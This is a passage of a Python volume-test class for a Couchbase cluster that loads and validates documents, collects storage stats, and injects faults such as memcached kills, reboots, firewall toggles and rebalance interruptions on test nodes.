delete_end=None, delete_start=None,
expire_end=None, expire_start=None,
read_end=None, read_start=None):
self.get_memory_footprint()
self.create_end = 0
self.create_start = 0
self.read_end = 0
self.read_start = 0
self.update_end = 0
self.update_start = 0
self.delete_end = 0
self.delete_start = 0
self.expire_end = 0
self.expire_start = 0
self.initial_items = self.final_items
doc_ops = doc_ops or self.doc_ops
self.mutations_to_validate = doc_ops
if "read" in doc_ops:
if read_start is not None:
self.read_start = read_start
else:
self.read_start = 0
if read_end is not None:
self.read_end = read_end
else:
self.read_end = self.num_items * self.mutation_perc/100
if "update" in doc_ops:
if update_start is not None:
self.update_start = update_start
else:
self.update_start = 0
if update_end is not None:
self.update_end = update_end
else:
self.update_end = self.num_items * self.mutation_perc/100
self.mutate += 1
if "delete" in doc_ops:
if delete_start is not None:
self.delete_start = delete_start
else:
self.delete_start = self.start
if delete_end is not None:
self.delete_end = delete_end
else:
self.delete_end = self.start + self.num_items * self.mutation_perc/100
self.final_items -= (self.delete_end - self.delete_start) * self.num_collections * self.num_scopes
if "expiry" in doc_ops:
if self.maxttl == 0:
self.maxttl = self.input.param("maxttl", 10)
if expire_start is not None:
self.expire_start = expire_start
else:
self.expire_start = self.delete_end
if expire_end is not None:
self.expire_end = expire_end
else:
                self.expire_end = self.expire_start + self.num_items * self.mutation_perc/100
self.final_items -= (self.expire_end - self.expire_start) * self.num_collections * self.num_scopes
if "create" in doc_ops:
if create_start is not None:
self.create_start = create_start
else:
self.create_start = self.end
self.start = self.create_start
if create_end is not None:
self.create_end = create_end
else:
self.create_end = self.end + (self.expire_end - self.expire_start) + (self.delete_end - self.delete_start)
self.end = self.create_end
self.final_items += (abs(self.create_end - self.create_start)) * self.num_collections * self.num_scopes
print "Read Start: %s" % self.read_start
print "Read End: %s" % self.read_end
print "Update Start: %s" % self.update_start
print "Update End: %s" % self.update_end
print "Delete Start: %s" % self.delete_start
print "Delete End: %s" % self.delete_end
print "Expiry End: %s" % self.expire_start
print "Expiry End: %s" % self.expire_end
print "Create Start: %s" % self.create_start
print "Create End: %s" % self.create_end
print "Final Start: %s" % self.start
print "Final End: %s" % self.end
def data_load(self, cmd=dict()):
self.ops_rate = self.input.param("ops_rate", 2000)
master = Server(self.cluster.master.ip, self.cluster.master.port,
self.cluster.master.rest_username, self.cluster.master.rest_password,
str(self.cluster.master.memcached_port))
self.tm = TaskManager(self.process_concurrency)
self.loader_map = dict()
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
ws = WorkLoadSettings(cmd.get("keyPrefix", self.key),
cmd.get("keySize", self.key_size),
cmd.get("docSize", self.doc_size),
cmd.get("cr", self.create_perc),
cmd.get("rd", self.read_perc),
cmd.get("up", self.update_perc),
cmd.get("dl", self.delete_perc),
cmd.get("ex", self.expiry_perc),
cmd.get("workers", self.process_concurrency),
cmd.get("ops", self.ops_rate),
cmd.get("loadType", None),
cmd.get("keyType", None),
cmd.get("valueType", None),
cmd.get("validate", False),
cmd.get("gtm", False),
cmd.get("deleted", False),
cmd.get("mutated", 0)
)
hm = HashMap()
hm.putAll({DRConstants.create_s: self.create_start,
DRConstants.create_e: self.create_end,
DRConstants.update_s: self.update_start,
DRConstants.update_e: self.update_end,
DRConstants.expiry_s: self.expire_start,
DRConstants.expiry_e: self.expire_end,
DRConstants.delete_s: self.delete_start,
DRConstants.delete_e: self.delete_end,
DRConstants.read_s: self.read_start,
DRConstants.read_e: self.read_end})
dr = DocRange(hm)
ws.dr = dr
dg = DocumentGenerator(ws, self.key_type, None)
self.loader_map.update({bucket.name+scope+collection: dg})
tasks = list()
i = self.process_concurrency
while i > 0:
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
client = NewSDKClient(master, bucket.name, scope, collection)
client.initialiseSDK()
self.sleep(1)
taskName = "Loader_%s_%s_%s_%s_%s" % (bucket.name, scope, collection, str(i), time.time())
task = WorkLoadGenerate(taskName, self.loader_map[bucket.name+scope+collection],
client, self.durability_level,
self.maxttl, self.time_unit,
self.track_failures, 0)
tasks.append(task)
self.tm.submit(task)
i -= 1
return tasks
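    # Typical call sequence in a test step (a sketch based only on the methods
    # in this class):
    #   self.generate_docs(doc_ops=["create"], create_start=0,
    #                      create_end=self.num_items)
    #   tasks = self.data_load()
    #   self.wait_for_doc_load_completion(tasks)
    #   self.data_validation()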
def wait_for_doc_load_completion(self, tasks, wait_for_stats=True):
self.tm.getAllTaskResult()
for task in tasks:
task.result = True
for optype, failures in task.failedMutations.items():
for failure in failures:
print("Test Retrying {}: {} -> {}".format(optype, failure.id(), failure.err().getClass().getSimpleName()))
if optype == "create":
try:
task.docops.insert(failure.id(), failure.document(), task.sdk.connection, task.setOptions);
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry Create failed for key: " + failure.id())
task.result = False
except DocumentExistsException as e:
pass
if optype == "update":
try:
task.docops.upsert(failure.id(), failure.document(), task.sdk.connection, task.upsertOptions);
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry update failed for key: " + failure.id())
task.result = False
except DocumentExistsException as e:
pass
if optype == "delete":
try:
task.docops.delete(failure.id(), task.sdk.connection, task.removeOptions);
# task.failedMutations.get(optype).remove(failure)
except (ServerOutOfMemoryException, TimeoutException) as e:
print("Retry delete failed for key: " + failure.id())
task.result = False
except DocumentNotFoundException as e:
pass
try:
task.sdk.disconnectCluster()
except Exception as e:
print(e)
self.assertTrue(task.result, "Task Failed: {}".format(task.taskName))
if wait_for_stats:
try:
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=1200)
self.bucket_util.verify_stats_all_buckets(self.cluster, self.final_items)
except Exception as e:
self.get_gdb()
raise e
def get_gdb(self):
for node in self.cluster.nodes_in_cluster:
gdb_shell = RemoteMachineShellConnection(node)
gdb_out = gdb_shell.execute_command('gdb -p `(pidof memcached)` -ex "thread apply all bt" -ex detach -ex quit')[0]
self.log.critical("GDB bt logs from node: %s\n %s"
% (node.ip, gdb_out))
gdb_shell.disconnect()
def data_validation(self):
doc_ops = self.mutations_to_validate
if self._data_validation:
self.log.info("Validating Active/Replica Docs")
cmd = dict()
self.ops_rate = self.input.param("ops_rate", 2000)
master = Server(self.cluster.master.ip, self.cluster.master.port,
self.cluster.master.rest_username, self.cluster.master.rest_password,
str(self.cluster.master.memcached_port))
self.tm = TaskManager(self.process_concurrency)
self.loader_map = dict()
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
for op_type in doc_ops:
cmd.update({"deleted": False})
hm = HashMap()
if op_type == "create":
hm.putAll({DRConstants.read_s: self.create_start,
DRConstants.read_e: self.create_end})
elif op_type == "update":
hm.putAll({DRConstants.read_s: self.update_start,
DRConstants.read_e: self.update_end})
elif op_type == "delete":
hm.putAll({DRConstants.read_s: self.delete_start,
DRConstants.read_e: self.delete_end})
cmd.update({"deleted": True})
else:
continue
dr = DocRange(hm)
ws = WorkLoadSettings(cmd.get("keyPrefix", self.key),
cmd.get("keySize", self.key_size),
cmd.get("docSize", self.doc_size),
cmd.get("cr", 0),
cmd.get("rd", 100),
cmd.get("up", 0),
cmd.get("dl", 0),
cmd.get("ex", 0),
cmd.get("workers", self.process_concurrency),
cmd.get("ops", self.ops_rate),
cmd.get("loadType", None),
cmd.get("keyType", None),
cmd.get("valueType", None),
cmd.get("validate", True),
cmd.get("gtm", False),
cmd.get("deleted", False),
cmd.get("mutated", 0))
ws.dr = dr
dg = DocumentGenerator(ws, self.key_type, None)
self.loader_map.update({bucket.name+scope+collection+op_type: dg})
tasks = list()
i = self.process_concurrency
while i > 0:
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for collection in bucket.scopes[scope].collections.keys():
if collection == "_default" and scope == "_default":
continue
for op_type in doc_ops:
if op_type not in ["create", "update", "delete"]:
continue
client = NewSDKClient(master, bucket.name, scope, collection)
client.initialiseSDK()
self.sleep(1)
taskName = "Validate_%s_%s_%s_%s_%s_%s" % (bucket.name, scope, collection, op_type, str(i), time.time())
task = WorkLoadGenerate(taskName, self.loader_map[bucket.name+scope+collection+op_type],
client, "NONE",
self.maxttl, self.time_unit,
self.track_failures, 0)
tasks.append(task)
self.tm.submit(task)
i -= 1
self.tm.getAllTaskResult()
for task in tasks:
try:
task.sdk.disconnectCluster()
except Exception as e:
print(e)
for task in tasks:
self.assertTrue(task.result, "Validation Failed for: %s" % task.taskName)
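# Return the bucket's active resident ratio (DGM percentage), retrying the stats REST call up to 5 times.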
def get_bucket_dgm(self, bucket):
self.rest_client = BucketHelper(self.cluster.master)
count = 0
dgm = 100
while count < 5:
try:
dgm = self.rest_client.fetch_bucket_stats(
bucket.name)["op"]["samples"]["vb_active_resident_items_ratio"][-1]
self.log.info("Active Resident Threshold of {0} is {1}".format(
bucket.name, dgm))
return dgm
except Exception as e:
self.sleep(5, e)
count += 1
return dgm
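# Inject the requested failure (stop server, firewall, memcached/erlang kill or reboot) on the given nodes; defaults to the cluster master.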
def _induce_error(self, error_condition, nodes=None):
nodes = nodes or [self.cluster.master]
for node in nodes:
if error_condition == "stop_server":
self.cluster_util.stop_server(self.cluster, node)
elif error_condition == "enable_firewall":
self.cluster_util.start_firewall_on_node(self.cluster, node)
elif error_condition == "kill_memcached":
self.cluster_util.kill_memcached(self.cluster, node=node)
elif error_condition == "reboot_server":
shell = RemoteMachineShellConnection(node)
shell.reboot_node()
elif error_condition == "kill_erlang":
shell = RemoteMachineShellConnection(node)
shell.kill_erlang()
self.sleep(self.sleep_time * 3)
shell.disconnect()
else:
self.fail("Invalid error induce option")
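# Undo the induced failure, then wait for ns_server readiness and bucket warm-up on every node.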
def _recover_from_error(self, error_condition):
for node in self.cluster.nodes_in_cluster:
if error_condition == "stop_server" or error_condition == "kill_erlang":
self.cluster_util.start_server(self.cluster, node)
elif error_condition == "enable_firewall":
self.cluster_util.stop_firewall_on_node(self.cluster, node)
for node in self.cluster.nodes_in_cluster:
result = self.cluster_util.wait_for_ns_servers_or_assert([node],
wait_time=1200)
self.assertTrue(result, "Server warmup failed")
self.check_warmup_complete(node)
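# Start an async rebalance that adds 'nodes_in' spare servers and removes 'nodes_out' non-master nodes, keeping the server bookkeeping lists in sync.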
def rebalance(self, nodes_in=0, nodes_out=0,
retry_get_process_num=3000):
self.servs_in = random.sample(self.available_servers, nodes_in)
self.nodes_cluster = self.cluster.nodes_in_cluster[:]
self.nodes_cluster.remove(self.cluster.master)
self.servs_out = random.sample(self.nodes_cluster, nodes_out)
if nodes_in == nodes_out:
self.vbucket_check = False
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init],
self.servs_in, self.servs_out,
check_vbucket_shuffling=self.vbucket_check,
retry_get_process_num=retry_get_process_num)
self.available_servers = [servs for servs in self.available_servers
if servs not in self.servs_in]
self.available_servers += self.servs_out
self.cluster.nodes_in_cluster.extend(self.servs_in)
self.cluster.nodes_in_cluster = list(set(self.cluster.nodes_in_cluster)
- set(self.servs_out))
return rebalance_task
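# Print a summary table of initial/current item counts and the key ranges touched by each mutation type.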
def print_crud_stats(self):
self.table = TableView(self.log.info)
self.table.set_headers(["Initial Items",
"Current Items",
"Items Updated",
"Items Created",
"Items Deleted",
"Items Expired"])
self.table.add_row([
str(self.initial_items),
str(self.final_items),
str(abs(self.update_start)) + "-" + str(abs(self.update_end)),
str(abs(self.create_start)) + "-" + str(abs(self.create_end)),
str(abs(self.delete_start)) + "-" + str(abs(self.delete_end)),
str(abs(self.expire_start)) + "-" + str(abs(self.expire_end))
])
self.table.display("Docs statistics")
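# One load cycle: run the data load, optionally wait for it, crash memcached, validate data, and fail the test if cb_logs report crashes.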
def perform_load(self, crash=False, num_kills=1, wait_for_load=True,
validate_data=True):
task = self.data_load()
if wait_for_load:
self.wait_for_doc_load_completion(task)
else:
return task
if crash:
self.kill_memcached(num_kills=num_kills)
if validate_data:
self.data_validation()
self.print_stats()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.PrintStep("CRASH | CRITICAL | WARN messages found in cb_logs")
if self.assert_crashes_on_load:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(result)
def print_stats(self):
self.bucket_util.print_bucket_stats(self.cluster)
self.print_crud_stats()
for bucket in self.cluster.buckets:
self.get_bucket_dgm(bucket)
if bucket.storageBackend == Bucket.StorageBackend.magma:
self.get_magma_disk_usage(bucket)
self.check_fragmentation_using_magma_stats(bucket)
self.check_fragmentation_using_kv_stats(bucket)
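# Log per-node fragmentation as reported by KV cbstats; informational only, nothing is asserted here.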
def check_fragmentation_using_kv_stats(self, bucket, servers=None):
result = dict()
if servers is None:
servers = self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
for server in servers:
frag_val = self.bucket_util.get_fragmentation_kv(
self.cluster, bucket, server)
self.log.debug("Current Fragmentation for node {} is {} \
".format(server.ip, frag_val))
result.update({server.ip: frag_val})
self.log.info("KV stats fragmentation values {}".format(result))
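# Collect per-shard magma fragmentation from every node and return True only if the worst value stays below the configured self.fragmentation percentage.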
def check_fragmentation_using_magma_stats(self, bucket, servers=None):
result = dict()
stats = list()
if servers is None:
servers = self.cluster.nodes_in_cluster
if type(servers) is not list:
servers = [servers]
for server in servers:
fragmentation_values = list()
shell = RemoteMachineShellConnection(server)
output = shell.execute_command(
"lscpu | grep 'CPU(s)' | head -1 | awk '{print $2}'"
)[0][0].split('\n')[0]
self.log.debug("machine: {} - core(s): {}".format(server.ip,
output))
for i in range(min(int(output), 64)):
grep_field = "rw_{}:magma".format(i)
_res = self.get_magma_stats(bucket, shell,
field_to_grep=grep_field)
fragmentation_values.append(float(_res[server.ip][grep_field]
["Fragmentation"]))
stats.append(_res)
result.update({server.ip: fragmentation_values})
shell.disconnect()
res = list()
for value in result.values():
res.append(max(value))
if max(res) < float(self.fragmentation)/100:
self.log.info("magma stats fragmentation result {} \
".format(result))
return True
self.log.info("magma stats fragmentation result {} \
".format(result))
self.log.info(stats)
return False
def get_magma_stats(self, bucket, shell=None, field_to_grep=None):
magma_stats_for_all_servers = dict()
cbstat_obj = Cbstats(shell)
result = cbstat_obj.magma_stats(bucket.name,
field_to_grep=field_to_grep)
magma_stats_for_all_servers[shell.ip] = result
return magma_stats_for_all_servers
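# Sum the on-disk size (MB) of the magma kvstore, wal, keyTree and seqTree directories across all nodes, warning when a kvstore directory holds 300 or more files.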
def get_magma_disk_usage(self, bucket=None):
if bucket is None:
bucket = self.bucket
servers = self.cluster.nodes_in_cluster
kvstore = 0
wal = 0
keyTree = 0
seqTree = 0
data_files = 0
for server in servers:
shell = RemoteMachineShellConnection(server)
bucket_path = os.path.join(RestConnection(server).get_data_path(),bucket.name)
kvstore += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*"))[0][0].split('\n')[0])
wal += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/wal"))[0][0].split('\n')[0])
keyTree += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*/rev*/key*"))[0][0].split('\n')[0])
seqTree += int(shell.execute_command("du -cm %s | tail -1 | awk '{print $1}'\
" % os.path.join(bucket_path, "magma.*/kv*/rev*/seq*"))[0][0].split('\n')[0])
cmd = 'find ' + bucket_path + '/magma*/ -maxdepth 1 -type d \
-print0 | while read -d "" -r dir; do files=("$dir"/*/*/*); \
printf "%d,%s\n" "${#files[@]}" "$dir"; done'
data_files = shell.execute_command(cmd)[0]
for files in data_files:
if "kvstore" in files and int(files.split(",")[0]) >= 300:
self.log.warn("Number of files in {}--{} is {}".format(
server.ip, files.split(",")[1].rstrip(), files.split(",")[0]))
shell.disconnect()
self.log.debug("Total Disk usage for kvstore is {}MB".format(kvstore))
self.log.debug("Total Disk usage for wal is {}MB".format(wal))
self.log.debug("Total Disk usage for keyTree is {}MB".format(keyTree))
self.log.debug("Total Disk usage for seqTree is {}MB".format(seqTree))
return kvstore, wal, keyTree, seqTree
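# Background thread: kill memcached on the target nodes at random 60-120s intervals until self.stop_crash is set or self.crashes iterations are done.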
def crash_thread(self, nodes=None, num_kills=1, graceful=False):
self.stop_crash = False
self.crash_count = 0
if not nodes:
nodes = self.cluster.nodes_in_cluster
while not self.stop_crash:
self.get_memory_footprint()
sleep = random.randint(60, 120)
self.sleep(sleep,
"Iteration:{} waiting to kill memc on all nodes".
format(self.crash_count))
self.kill_memcached(nodes, num_kills=num_kills,
graceful=graceful, wait=True)
self.crash_count += 1
if self.crash_count > self.crashes:
self.stop_crash = True
self.sleep(300)
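# Kill (or gracefully restart) memcached num_kills times on each server, abort all tasks if coredumps/critical logs appear, and optionally wait for warm-up.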
def kill_memcached(self, servers=None, num_kills=1,
graceful=False, wait=True):
if not servers:
servers = self.cluster.nodes_in_cluster
for _ in xrange(num_kills):
self.sleep(5, "Sleep for 5 seconds between continuous memc kill")
for server in servers:
shell = RemoteMachineShellConnection(server)
if graceful:
shell.restart_couchbase()
else:
shell.kill_memcached()
shell.disconnect()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
if wait:
for server in servers:
self.check_warmup_complete(server)
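# Watchdog loop: poll for coredumps/critical log messages and log per-bucket memory stats every 60s while self.check_dump_thread is set.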
def check_dump(self):
count = 1
shells = list()
for server in self.cluster.nodes_in_cluster:
shells.append(RemoteMachineShellConnection(server))
while self.check_dump_thread:
self.log.debug("Checking crashes {}".format(count))
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.check_dump_thread = False
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
for shell in shells:
for bucket in self.cluster.buckets:
output = shell.execute_command(
'/opt/couchbase/bin/cbstats localhost:11210 memory \
-u Administrator -p password -b {} | grep -e \
ep_arena:resident -e ep_arena:allocated \
-e mem_used:'.format(bucket.name))[0]
self.log.debug("{}: {}".format(shell.ip,
output[0].replace(" ", "")
.strip()))
self.log.debug("{}: {}".format(shell.ip,
output[1].replace(" ", "")
.strip()))
self.log.debug("{}: {}".format(shell.ip,
output[2].replace(" ", "")
.strip()))
self.sleep(60)
count += 1
for shell in shells:
shell.disconnect()
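# Block until bucket warm-up finishes on the given server, aborting all tasks if it does not complete in time.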
def check_warmup_complete(self, server):
for bucket in self.cluster.buckets:
start_time = time.time()
result = self.bucket_util._wait_warmup_completed(
[server],
bucket,
wait_time=self.wait_timeout * 20)
if not result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertTrue(result, "Warm-up failed in %s seconds"
% (self.wait_timeout * 20))
else:
self.log.info("Bucket:%s warm-up completed in %s." %
(bucket.name, str(time.time() - start_time)))
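# Force rollbacks: stop persistence on one node, load items only into its active vbuckets, kill memcached so the unpersisted mutations roll back, then re-verify item counts.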
def perform_rollback(self, start=None, mem_only_items=100000,
doc_type="create", kill_rollback=1):
if not self.rollback:
return
rollbacks = self.input.param("rollbacks", 2)
# mem_only_items = random.randint(mem_only_items, mem_only_items*2)
_iter = 0
self.gen_create, self.gen_update, self.gen_delete, self.gen_expiry = [None]*4
while _iter < rollbacks:
self.PrintStep("Rollback with %s: %s" % (doc_type,
str(_iter)))
tasks_info = dict()
node = self.cluster.nodes_in_cluster[0]
# Stopping persistence on NodeA
mem_client = MemcachedClientHelper.direct_client(
node, self.cluster.buckets[0])
mem_client.stop_persistence()
shell = RemoteMachineShellConnection(node)
cbstats = Cbstats(shell)
target_vbucket = cbstats.vbucket_list(self.cluster.buckets[0].
name)
shell.disconnect()
gen_docs = doc_generator(
self.key_prefix,
start, mem_only_items,
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=target_vbucket,
vbuckets=self.cluster.vbuckets,
key_size=self.key_size,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size)
if doc_type == "create":
self.gen_create = gen_docs
if doc_type == "update":
self.gen_update = gen_docs
if doc_type == "delete":
self.gen_delete = gen_docs
if doc_type == "expiry":
self.gen_expiry = gen_docs
if self.maxttl == 0:
self.maxttl = self.input.param("maxttl", 10)
doc_type = "update"
task = self.perform_load(wait_for_load=False)
self.wait_for_doc_load_completion(task, wait_for_stats=False)
ep_queue_size_map = {node: mem_only_items *
self.num_scopes *
self.num_collections}
vb_replica_queue_size_map = {node: 0}
for server in self.cluster.nodes_in_cluster:
if server.ip != node.ip:
ep_queue_size_map.update({server: 0})
vb_replica_queue_size_map.update({server: 0})
for bucket in self.cluster.buckets:
self.bucket_util._wait_for_stat(bucket, ep_queue_size_map,
timeout=3600)
self.bucket_util._wait_for_stat(
bucket,
vb_replica_queue_size_map,
stat_name="vb_replica_queue_size",
timeout=3600)
self.kill_memcached(num_kills=kill_rollback)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
self.print_stats()
_iter += 1
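# Stop and restart the running rebalance each time it advances another 20% of progress, returning the final rebalance task.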
def pause_rebalance(self):
rest = RestConnection(self.cluster.master)
i = 1
self.sleep(10, "Let the rebalance begin!")
expected_progress = 20
while expected_progress < 100:
expected_progress = 20 * i
reached = RestHelper(rest).rebalance_reached(expected_progress)
self.assertTrue(reached, "Rebalance failed or did not reach {0}%"
.format(expected_progress))
if not RestHelper(rest).is_cluster_rebalanced():
self.log.info("Stop the rebalance")
stopped = rest.stop_rebalance(wait_timeout=self.wait_timeout / 3)
self.assertTrue(stopped, msg="Unable to stop rebalance")
rebalance_task = self.task.async_rebalance(self.cluster.nodes_in_cluster,
[], [],
retry_get_process_num=3000)
self.sleep(10, "Rebalance % ={}. Let the rebalance begin!".
format(expected_progress))
i += 1
return rebalance_task
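# Repeatedly interrupt the rebalance at successive 20% progress milestones by injecting the given error, recover, and restart it; returns the last rebalance task.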
def abort_rebalance(self, rebalance, error_type="kill_memcached"):
self.sleep(30, "Let the rebalance begin!")
rest = RestConnection(self.cluster.master)
i = 1
expected_progress = 20
rebalance_task = rebalance
while expected_progress < 80:
expected_progress = 20 * i
reached = RestHelper(rest).rebalance_reached(expected_progress,
wait_step=10)
self.assertTrue(reached, "Rebalance failed or did not reach {0}%"
.format(expected_progress))
if not RestHelper(rest).is_cluster_rebalanced():
self.log.info("Abort rebalance")
self._induce_error(error_type)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
self.sleep(60, "Sleep after error introduction")
self._recover_from_error(error_type)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
try:
self.task.jython_task_manager.get_task_result(rebalance_task)
except RebalanceFailedException:
pass
if rebalance.result:
self.log.error("Rebalance passed/finished which is not expected")
self.log.info("Rebalance % after rebalance finished = {}".
format(expected_progress))
break
else:
self.log.info("Restarting Rebalance after killing at {}".
format(expected_progress))
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], self.servs_out,
retry_get_process_num=3000)
self.sleep(120, "Let the rebalance begin after abort")
self.log.info("Rebalance % = {}".
format(self.rest._rebalance_progress()))
i += 1
return rebalance_task
def PrintStep(self, msg=None):
print("\n")
print("#"*60)
print("#")
print("# %s" % msg)
print("#")
print("#"*60)
print("\n")
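# Volume scenario: initial load followed by rebalance in/out/swap, graceful failovers with full and delta recovery, and replica changes, with CRUD load and validation at every step.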
def ClusterOpsVolume(self):
#######################################################################
def end_step_checks(tasks):
self.wait_for_doc_load_completion(tasks)
self.data_validation()
self.print_stats()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
self.loop = 0
while self.loop < self.iterations:
'''
Create sequential: 0 - 10M
Final Docs = 10M (0-10M, 10M seq items)
'''
self.create_perc = 100
self.PrintStep("Step 3: Create %s items sequentially" % self.num_items)
self.generate_docs(doc_ops=["create"],
create_start=self.start, create_end=self.num_items)
self.perform_load(validate_data=False)
self.PrintStep("Step 3.1: Update %s RandonKey keys to create 50 percent fragmentation" % str(self.num_items))
self.generate_docs(doc_ops=["update"],
update_start=self.start, update_end=self.end)
self.perform_load(validate_data=False)
###################################################################
'''
Existing:
Sequential: 0 - 10M
This Step:
Create Random: 0 - 20M
Final Docs = 30M (0-20M, 20M Random)
Nodes In Cluster = 3
'''
self.PrintStep("Step 4: Create %s random keys" % str(self.num_items))
self.generate_docs(doc_ops=["create"],
create_start=self.end, create_end=self.end+self.num_items)
self.perform_load(validate_data=False)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 20M
This Step:
Update Sequential: 0 - 10M
Update Random: 0 - 20M to create 50% fragmentation
Final Docs = 30M (0-20M, 20M Random)
Nodes In Cluster = 3
'''
self.update_perc = 100
self.PrintStep("Step 5: Update %s random keys to create 50 percent fragmentation" % str(self.num_items))
self.generate_docs(doc_ops=["update"],
update_start=self.start, update_end=self.end)
self.perform_load(validate_data=False)
self.mutation_perc = self.input.param("mutation_perc", 100)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 20M
This Step:
Create Random: 20 - 30M
Delete Random: 10 - 20M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 4
Final Docs = 30M (Random: 0-10M, 20-30M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.create_perc = 25
self.update_perc = 25
self.delete_perc = 25
self.expiry_perc = 25
self.read_perc = 25
self.PrintStep("Step 6: Rebalance in with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 20 - 30M
This Step:
Create Random: 30 - 40M
Delete Random: 20 - 30M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 3
Final Docs = 30M (Random: 0-10M, 30-40M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 7: Rebalance Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=0, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 30 - 40M
This Step:
Create Random: 40 - 50M
Delete Random: 30 - 40M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 4
Final Docs = 30M (Random: 0-10M, 40-50M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.PrintStep("Step 8: Rebalance In_Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=2, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 40 - 50M
This Step:
Create Random: 50 - 60M
Delete Random: 40 - 50M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 4 (SWAP)
Final Docs = 30M (Random: 0-10M, 50-60M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.PrintStep("Step 9: Swap with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 50 - 60M
This Step:
Create Random: 60 - 70M
Delete Random: 50 - 60M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 3
Final Docs = 30M (Random: 0-10M, 60-70M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 10: Failover a node and RebalanceOut that node \
with loading in parallel")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster, self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.assertTrue(self.rest.monitorRebalance(), msg="Failover -> Rebalance failed")
self.nodes = self.rest.node_statuses()
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
